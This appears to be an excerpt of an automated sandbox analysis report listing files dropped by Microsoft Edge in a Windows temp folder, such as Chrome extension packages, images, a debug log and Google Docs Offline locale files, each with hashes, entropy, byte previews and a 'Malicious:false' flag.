                                                                                                                                                                                                                                                                        Preview:[ {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/2EB9ED8D96E16FF129A1EC2A8BE1CE4C",.. "id": "2EB9ED8D96E16FF129A1EC2A8BE1CE4C",.. "title": "Google Network Speech",.. "type": "background_page",.. "url": "chrome-extension://neajdppkdcdipfabeoofebfddakdcjhd/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/2EB9ED8D96E16FF129A1EC2A8BE1CE4C"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/B68FCE9A0BC156D46A29AD593E7EE68E",.. "id": "B68FCE9A0BC156D46A29AD593E7EE68E",.. "title": "Google Hangouts",.. "type": "background_page",.. "url": "chrome-extension://nkeimhogjdpnpccoofpliimaahmaaome/background.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/B68FCE9A0BC156D46A29AD593E7EE68E"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtoo

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\3ac05e96-aa03-47ac-a3b8-2c3a55c8ca20.tmp

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:very short file (no magic)
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1
                                                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3:L:L
                                                                                                                                                                                                                                                                        MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                        SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                        SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                        SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:.

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\7c3ee062-c415-42cc-b612-ba45ab58195f.tmp

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):154477
                                                                                                                                                                                                                                                                        Entropy (8bit):7.835886983924039
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3072:edP3YiyHk53xr3zWwaFYgn5JFug0HjaHNK7XeSD/r/pLbWNiOAo1np:edPYJHAzyVu7HjacuSD/rBPBOJnp
                                                                                                                                                                                                                                                                        MD5:14937B985303ECCE4196154A24FC369A
                                                                                                                                                                                                                                                                        SHA1:ECFE89E11A8D08CE0C8745FF5735D5EDAD683730
                                                                                                                                                                                                                                                                        SHA-256:71006A5311819FEF45C659428944897184880BCDB571BF68C52B3D6EE97682FF
                                                                                                                                                                                                                                                                        SHA-512:1D03C75E4D2CD57EEE7B0E93E2DE293B41F280C415FB2446AC234FC5AFD11FE2F2FCC8AB9843DB0847C2CE6BD7DF7213FCF249EA71896FBF6C0696E3F5AEE46C
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:Cr24..............0.."0...*.H.............0.........^...1"...w.g..t..2J.G1.)X4..=&.?[j,Lz..j.u.e[I.q*Ba/X...P.h..L.....2%3_o.......H.)'.=.e...?.......j..3UH.|.X.M..u..s[.*..?$....F%....I....)..,-./.e5).f..O.q.^........9..(.._.ph2..^.YBPXf_8....h[.v...S.*1`.#..5.SF.:f-.#.65.i..b.]9...y2.'....k[........%0............G.m.}...CG.....a.s.:.S..QiI.fT.k.MdOF.2....D...v`m...M.7'.R.d...8....2..~.<w8!.W..Sg.._A6.(.pC..w.=..!..7h!J...].....3......Kf..k...|....6./.p.....A....e.1.y.<~Mu..+(v8W........?=.V+.Gb&...u8)...=Qt...... ......x.}.f..&X.SN9e..L....[0Y0...*.H.=....*.H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...G0E.!....~..E...Au.C.q..y.?2An.a..Zn}. H~.vtgI...o.|.j.e....p.........".&...........Z]o.H..+..zF.......S.E}@.F..".P`...3......jW....H.H...:..8.......<...........Z.e.>..vV.......J.,/.X.....?.%.....6....m#.u].Z...[.s.M_...J.."9l..l...,|.....r...QC.....4:....wj.O...5....s.n.%.....y....c.....#F........)gv(..!S

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\9c0cb3fb-bd80-4eaf-9485-e80caa6091bd.tmp

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:very short file (no magic)
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1
                                                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3:L:L
                                                                                                                                                                                                                                                                        MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                        SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                        SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                        SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:.

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\a630e57c-5414-468a-80e9-f69c119dc9a0.tmp

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:PNG image data, 50 x 50, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1572579
                                                                                                                                                                                                                                                                        Entropy (8bit):7.991930814320996
                                                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                                                        SSDEEP:24576:3BIUKcBnIhpIPXEJYhLr5M8h2sktqtpnzxro6gPnORAIBx6LpI9brLetNBIkLYG:WUK3p0X9L1fktqrn1OIBY6ZfOBIWB
                                                                                                                                                                                                                                                                        MD5:991FFAF9913B82DEF8540824C66C9516
                                                                                                                                                                                                                                                                        SHA1:344197E5FD1AA734DB527F1CFF94E6DDE5AB4CEC
                                                                                                                                                                                                                                                                        SHA-256:5BFD7AAF23CAC8B8A320EB15178A25D233D94BD142F87C63890A9A113DEC682B
                                                                                                                                                                                                                                                                        SHA-512:8BAD3972CCB42B3828BB608FE3B711C338343FB565180B3919C5B297E28E3B03895EA476DDA724B9EAB0E8126D6602B3E6AB2148F820C28A6D9981A73449B5C7
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:.PNG........IHDR...2...2......?.....?iCCPICC Profile..H..W.XS...[.....@@J.M......B..6B. ...A..*.v...].Q..bG.,../.T.u.`W............9.3...{....<.$... _\(...d.JMc.......8.K..@......../..D.^q.k.....-.......q......~..*.DZ..Q.[L*..1.@G...x..g)q..g(.n.Mb<..V..<.4...%.3..YP.....X ....../?....t.m...b.>+.....if.j.xY.X9.EQ...H.xS..t..'..a.+5[../.3......rL..G.....6..D..=.(%[....G.....3...........!..H...)..B.W.:YT.M.X........F.x./.!S.a...<....}Yn.[..:[.U.c......).[....!.C.T......Y.........[B./...*...LiH..,.``...l.7Z...f'.)..y...\.KB1;i@GX0*r`..aP.r..3.8)A..AR.....S$y.*{.\..*..!v+(JP....T....De.xq./<V....D....L .5.L.9@......=!... ............k.(..B$.......BP........2..E....... ...{.b.x.[2x...?..`..x.`...{~...!..bd.......`b.1..B...q?......X]p..50....'...C.5B'..xQ...(.@'..Q."..\..P....}.:T..pC...A?l..zv.,G..<+...6......LF.C..d.G....*.\...e..........C............`'.s.a..0.cX........X.....+..:....x..L.8.:w;.Q...'...3A2E*...d...A...N......./...8.w..k.......c.....s......

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\cbbc936b-48a8-40d3-a8b0-42c9b4b328a9.tmp

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):11185
                                                                                                                                                                                                                                                                        Entropy (8bit):7.951995436832936
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
                                                                                                                                                                                                                                                                        MD5:78E47DDA17341BED7BE45DCCFD89AC87
                                                                                                                                                                                                                                                                        SHA1:1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
                                                                                                                                                                                                                                                                        SHA-256:67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
                                                                                                                                                                                                                                                                        SHA-512:9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:Cr24..............0.."0...*.H.............0.........N.......E#......9e.u.q...VYY..@.+.C..k.O..bK.`..6.G..%.....3Z...e _.6....F..1p..K.Z......./ .3...OT..`..0...Y...FT..43.th.y...}....p.L...2S.&i.`..o...f.oH.....N..:..ijT.3.F{.0.,.f?'f.CQt;b_"Pc.. ..~S.I.c.8Z.;.....{G.a......k...>.`.o..%.$>;.....g.............jg?.R..@.:..........&..{...x@.Py..;kT....%F".S..w...N....9...A..@X.t!i.@..1;......1E..X.....[.~$....J......;=T.;)k..Y...$......S......M.P..P..>..=..u.....2p...w.9..1qw.a\A..Vj .C.....A..Cf1.r6.A...L. _m...[..l.Wr_../.. .B..9!.!+..ZG.K.......0.."0...*.H.............0.........^SUd%Q.L].......Cl2o...\[.....'*...;R=....N.C5....d. .....J.C>u.kr..Y..syJC.XS.q..E.n?....(G.5..)2.G..!.M.SS.{..U....!.EE..M[.#qs.A.1...g)nQ.c..G....Bd..7... .O.BI..KXQ..4.d.K.0......g.....-p....Z.E{...M&.~n.TE7..{0....5.#.C+3.y)pd9.e.........@..3.9..B.....I....2nX........2.?.~..S....]G.N.....Lr.O.Ve....9..D1.G..W)...P.?=.#..7.R.lz..a.wX.e..h.h.~....v..RP.@X....d.G

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\cv_debug.log

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):2110
                                                                                                                                                                                                                                                                        Entropy (8bit):5.409246378141753
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:48:Yzj57SnaJ57H57Uv5W1Sj5W175zuR5z+5zn071eDJk5c1903bj5jJp0gcU854Rr8:8e2Fa116uCntc5toYj0IHM
                                                                                                                                                                                                                                                                        MD5:D9B7B5A1580E2A6F2938FD64DC17F6D8
                                                                                                                                                                                                                                                                        SHA1:30DB665C6F6F551EC3FAE35B80CB446668DC18CC
                                                                                                                                                                                                                                                                        SHA-256:87182ABF55EC074FD33B05FF821CFC4E5F35833F4E7A6CE3C8C33C2E20620CDB
                                                                                                                                                                                                                                                                        SHA-512:457735C472D9C2550C1CA6BE95BF66FDEB6313799E651CC01BAA64591515F372CB352BE0E67D6304C4C6291A89494BEFA80248EC8F0BC8E80BC494FC6446FB9A
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:{"logTime": "1004/133448", "correlationVector":"vYS73lRT+EoO2Owh9jsc+Y","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133448", "correlationVector":"n/KhuHPhHmYXokB31+JZz7","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133448", "correlationVector":"fclQx26bUZO07waFEDe6Fn","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133448", "correlationVector":"0757l0tkKt37vNrdCKAm8w","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133449", "correlationVector":"uTRRkmbbqkgK/wPBCS4fct","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133449", "correlationVector":"2DrXipL1ngF91RN7IemK0e","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/134324", "correlationVector":"d0GyjEgnW85fvDIojHVIXI","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/134324", "correlationVector":"PvfzGWRutB/kmuXUK+c8XA","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/134324", "correlationVector":"29CB75FBC4C942E0817A1F7A0E2CF647

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\df5f8175-31bc-4a6b-9ffc-bf32b0f935a2.tmp

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 41900
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):76321
                                                                                                                                                                                                                                                                        Entropy (8bit):7.996057445951542
                                                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                                                        SSDEEP:1536:hS5Vvm808scZeEzFrSpzBUl4MZIGM/iys3BBrYunau6wpGzxue:GdS8scZNzFrMa4M+lK5/nXexue
                                                                                                                                                                                                                                                                        MD5:D7A1AC56ED4F4D17DD0524C88892C56D
                                                                                                                                                                                                                                                                        SHA1:4153CA1A9A4FD0F781ECD5BA9D2A1E68C760ECD4
                                                                                                                                                                                                                                                                        SHA-256:0A29576C4002D863B0C5AE7A0B36C0BBEB0FB9AFD16B008451D4142C07E1FF2B
                                                                                                                                                                                                                                                                        SHA-512:31503F2F6831070E887EA104296E17EE755BB6BBFB1EF2A15371534BFA2D3F0CD53862389625CF498754B071885A53E1A7F82A3546275DB1F4588E0E80BF7BEE
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:...........m{..(.}...7.\...N.D*.w..m..q....%XfL.*I.ql..;/.....s...E...0....`..A..[o^.^Y...F_.'.*.."L...^.......Y..W..l...E0..YY...:.&.u?....J..U<.q."...p.ib:.g.*.^.q.mr.....^&.{.E.....,EAp.q.......=.=.....z^.,d.^..J.R..zI4..2b?.-D5/.^...+.G..Y..?5..k........i.,.T#........_DV....P..d2......b\..L....o....Z.}../....CU.$.-..D9`..~......=....._.2O..?....b.{...7IY.L..q....K....T..5m.d.s.4.^... ..~<..7~6OS..b...^>.......s..n....k."..G.....L...z.U...... ... .ZY...,...kU1..N...(..V.r\$..s...X.It...x.mr..W....g........9DQR....*d......;L.S.....G... .._D.{.=.zI.g.Y~...`T..p.yO..4......8$..v.J..I.%..._.d.[..du5._._...?\..8.c.....U...fy.t....q.t....T@.......:zu..\,.!.I..AN_.....FeX..h.c.i.W.......(.....Y..F...R%.\..@.. 2(e,&.76..F+...l.t.$..`...........Wi.{.U.&(.b}...}.i..,...k....!..%...&.c..D-."..SQ.......q9....)j....7.".N....AX...).d./giR....uk.....s.....^...........:...~......(hP..K.@.&..?.E0:+D|9...U.q.cu..)t{.e...X...{.....z......LL&I6.=.

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\f666a83f-eb92-4f43-97db-c12b6ed23f82.tmp

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 1366x720, components 3
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):206855
                                                                                                                                                                                                                                                                        Entropy (8bit):7.983996634657522
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3072:5WcDW3D2an0GMJGqJCj+1ZxdmdopHjHTFYPQyairiVoo4XSWrPoiXvJddppWmEI5:l81Lel7E6lEMVo/S01fDpWmEgD
                                                                                                                                                                                                                                                                        MD5:788DF0376CE061534448AA17288FEA95
                                                                                                                                                                                                                                                                        SHA1:C3B9285574587B3D1950EE4A8D64145E93842AEB
                                                                                                                                                                                                                                                                        SHA-256:B7FB1D3C27E04785757E013EC1AC4B1551D862ACD86F6888217AB82E642882A5
                                                                                                                                                                                                                                                                        SHA-512:3AA9C1AA00060753422650BBFE58EEEA308DA018605A6C5287788C3E2909BE876367F83B541E1D05FE33F284741250706339010571D2E2D153A5C5A107D35001
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:......Exif..II*.................Ducky.......2......Adobe.d...........................................................#"""#''''''''''..................................................!! !!''''''''''........V.."....................................................................................!1..AQ..aq."2....R..T....Br.#S.U..b..3Cs...t6.c.$D.5uV...4d.E&....%F......................!1..AQaq....."2......BRbr3CS....#..4.............?......1f.n..T......TP....E...........P.....@.........E..@......E.P........@........E.....P.P..A@@.E..@.P.P..AP.P..AP..@....T..AP.E..P.Z .. ....."... .....7.H...w.....t.....T....M.."... P..n.n..t5..*B.P..*(.................*.....................( ..................*.. .".... .".......(.. .".....*.. ....o......E.6... ..*..."........."J......Ah......@.@@....:@{6..wCp..3...((.(......................*...@..(...."....................*......*.. ........T.......@.@@........AP.P..@.E@....E@.d.E@.@@..@.P.T..@..@..P.D...@M........EO..."...=.wCp.....R......P.@......

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5500_395530944\7c3ee062-c415-42cc-b612-ba45ab58195f.tmp

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):154477
                                                                                                                                                                                                                                                                        Entropy (8bit):7.835886983924039
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3072:edP3YiyHk53xr3zWwaFYgn5JFug0HjaHNK7XeSD/r/pLbWNiOAo1np:edPYJHAzyVu7HjacuSD/rBPBOJnp
                                                                                                                                                                                                                                                                        MD5:14937B985303ECCE4196154A24FC369A
                                                                                                                                                                                                                                                                        SHA1:ECFE89E11A8D08CE0C8745FF5735D5EDAD683730
                                                                                                                                                                                                                                                                        SHA-256:71006A5311819FEF45C659428944897184880BCDB571BF68C52B3D6EE97682FF
                                                                                                                                                                                                                                                                        SHA-512:1D03C75E4D2CD57EEE7B0E93E2DE293B41F280C415FB2446AC234FC5AFD11FE2F2FCC8AB9843DB0847C2CE6BD7DF7213FCF249EA71896FBF6C0696E3F5AEE46C
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:Cr24..............0.."0...*.H.............0.........^...1"...w.g..t..2J.G1.)X4..=&.?[j,Lz..j.u.e[I.q*Ba/X...P.h..L.....2%3_o.......H.)'.=.e...?.......j..3UH.|.X.M..u..s[.*..?$....F%....I....)..,-./.e5).f..O.q.^........9..(.._.ph2..^.YBPXf_8....h[.v...S.*1`.#..5.SF.:f-.#.65.i..b.]9...y2.'....k[........%0............G.m.}...CG.....a.s.:.S..QiI.fT.k.MdOF.2....D...v`m...M.7'.R.d...8....2..~.<w8!.W..Sg.._A6.(.pC..w.=..!..7h!J...].....3......Kf..k...|....6./.p.....A....e.1.y.<~Mu..+(v8W........?=.V+.Gb&...u8)...=Qt...... ......x.}.f..&X.SN9e..L....[0Y0...*.H.=....*.H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...G0E.!....~..E...Au.C.q..y.?2An.a..Zn}. H~.vtgI...o.|.j.e....p.........".&...........Z]o.H..+..zF.......S.E}@.F..".P`...3......jW....H.H...:..8.......<...........Z.e.>..vV.......J.,/.X.....?.%.....6....m#.u].Z...[.s.M_...J.."9l..l...,|.....r...QC.....4:....wj.O...5....s.n.%.....y....c.....#F........)gv(..!S

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5500_395530944\CRX_INSTALL\128.png

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):4982
                                                                                                                                                                                                                                                                        Entropy (8bit):7.929761711048726
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:96:L7Rf7U1ylWb3KfyEfOXE+PIcvBirQFiAql1ZwKREkXCSAk:pTvWqfD+gl0sAql1u7kySAk
                                                                                                                                                                                                                                                                        MD5:913064ADAAA4C4FA2A9D011B66B33183
                                                                                                                                                                                                                                                                        SHA1:99EA751AC2597A080706C690612AEEEE43161FC1
                                                                                                                                                                                                                                                                        SHA-256:AFB4CE8882EF7AE80976EBA7D87F6E07FCDDC8E9E84747E8D747D1E996DEA8EB
                                                                                                                                                                                                                                                                        SHA-512:162BF69B1AD5122C6154C111816E4B87A8222E6994A72743ED5382D571D293E1467A2ED2FC6CC27789B644943CF617A56DA530B6A6142680C5B2497579A632B5
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:.PNG........IHDR..............>a....=IDATx..]}...U..;...O.Q..QH.I(....v..E....GUb*..R[.4@%..hK..B..(.B..". ....&)U#.%...jZ...JC.8.....{.cfvgf.3;.....}ow.....{...P.B...*T.P.B...*Tx...=.Q..wv.w.....|.e.1.$.P.?..l_\.n.}...~.g.....Q...A.f....m.....{,...C2 %..X.......FE.1.N..f...Q..D.K87.....:g..Q.{............3@$.8.....{.....q....G.. .....5..y......)XK..F...D.......... ."8...J#.eM.i....H.E.....a.RIP.`......)..T.....! .[p`X.`..L.a....e. .T..2.....H..p$..02...j....\..........s{...Ymm~.a........f.$./.[.{..C.2:.0..6..]....`....NW.....0..o.T..$;k.2......_...k..{,.+........{..6...L..... .dw...l$..}...K...EV....0......P...e....k....+Go....qw.9.1...X2\..qfw0v.....N...{...l.."....f.A..I..+#.v....'..~E.N-k.........{...l.$..ga..1...$......x$X=}.N..S..B$p..`..`.ZG:c..RA.(.0......Gg.A.I..>...3u.u........_..KO.m.........C...,..c.......0...@_..m...-..7.......4LZ......j@.......\..'....u. QJ.:G..I`.w'B0..w.H..'b.0- ......|..}./.....e..,.K.1........W.u.v. ...\.o

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5500_395530944\CRX_INSTALL\_locales\af\messages.json

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):908
                                                                                                                                                                                                                                                                        Entropy (8bit):4.512512697156616
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12:1HASvgMTCBxNB+kCIww3v+BBJ/wjsV8lCBxeBeRiGTCSU8biHULaBg/4srCBhUJJ:1HAkkJ+kCIwEg/wwbw0PXa22QLWmSDg
                                                                                                                                                                                                                                                                        MD5:12403EBCCE3AE8287A9E823C0256D205
                                                                                                                                                                                                                                                                        SHA1:C82D43C501FAE24BFE05DB8B8F95ED1C9AC54037
                                                                                                                                                                                                                                                                        SHA-256:B40BDE5B612CFFF936370B32FB0C58CC205FC89937729504C6C0B527B60E2CBA
                                                                                                                                                                                                                                                                        SHA-512:153401ECDB13086D2F65F9B9F20ACB3CEFE5E2AEFF1C31BA021BE35BF08AB0634812C33D1D34DA270E5693A8048FC5E2085E30974F6A703F75EA1622A0CA0FFD
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "SKEP NUWE".. },.. "explanationofflinedisabled": {.. "message": "Jy is vanlyn. As jy Google Dokumente sonder 'n internetverbinding wil gebruik, moet jy die volgende keer as jy aan die internet gekoppel is na instellings op die Google Dokumente-tuisblad gaan en vanlynsinkronisering aanskakel.".. },.. "explanationofflineenabled": {.. "message": "Jy is vanlyn, maar jy kan nog steeds beskikbare l.ers redigeer of nuwes skep.".. },.. "extdesc": {.. "message": "Skep, wysig en bekyk jou dokumente, sigblaaie en aanbiedings . alles sonder toegang tot die internet.".. },.. "extname": {.. "message": "Google Vanlyn Dokumente".. },.. "learnmore": {.. "message": "Kom meer te wete".. },.. "popuphelptext": {.. "message": "Skryf, redigeer en werk saam, waar jy ook al is, met of sonder 'n internetverbinding.".. }..}..

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5500_395530944\CRX_INSTALL\_locales\am\messages.json

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1285
                                                                                                                                                                                                                                                                        Entropy (8bit):4.702209356847184
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24:1HAn6bfEpxtmqMI91ivWjm/6GcCIoToCZzlgkX/Mj:W6bMt3MITFjm/Pcd4oCZhg6k
                                                                                                                                                                                                                                                                        MD5:9721EBCE89EC51EB2BAEB4159E2E4D8C
                                                                                                                                                                                                                                                                        SHA1:58979859B28513608626B563138097DC19236F1F
                                                                                                                                                                                                                                                                        SHA-256:3D0361A85ADFCD35D0DE74135723A75B646965E775188F7DCDD35E3E42DB788E
                                                                                                                                                                                                                                                                        SHA-512:FA3689E8663565D3C1C923C81A620B006EA69C99FB1EB15D07F8F45192ED9175A6A92315FA424159C1163382A3707B25B5FC23E590300C62CBE2DACE79D84871
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "... ...".. },.. "explanationofflinedisabled": {.. "message": "..... .. .... Google ..... ........ ..... ..... .Google .... ... .. .. .. ..... .... ....... .. ....... ... .. .. ..... .. ..... ....".. },.. "explanationofflineenabled": {.. "message": "..... .. .... ... .. .... .... ..... .... ... ..... .... .....".. },.. "extdesc": {.. "message": "...... ..... .... ... .. ..... ...... ..... .... .. ..... . .... .. ...... .....".. },.. "extname": {.. "message": "..... .. Goog

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5500_395530944\CRX_INSTALL\_locales\ar\messages.json

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1244
                                                                                                                                                                                                                                                                        Entropy (8bit):4.5533961615623735
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12:1HASvgPCBxNhieFTr9ogjIxurIyJCCBxeh6wAZKn7uCSUhStuysUm+WCBhSueW1Y:1HAgJzoaC6VEn7Css8yoXzzd
                                                                                                                                                                                                                                                                        MD5:3EC93EA8F8422FDA079F8E5B3F386A73
                                                                                                                                                                                                                                                                        SHA1:24640131CCFB21D9BC3373C0661DA02D50350C15
                                                                                                                                                                                                                                                                        SHA-256:ABD0919121956AB535E6A235DE67764F46CFC944071FCF2302148F5FB0E8C65A
                                                                                                                                                                                                                                                                        SHA-512:F40E879F85BC9B8120A9B7357ED44C22C075BF065F45BEA42BD5316AF929CBD035D5D6C35734E454AEF5B79D378E51A77A71FA23F9EBD0B3754159718FCEB95C
                                                                                                                                                                                                                                                                        Malicious:false
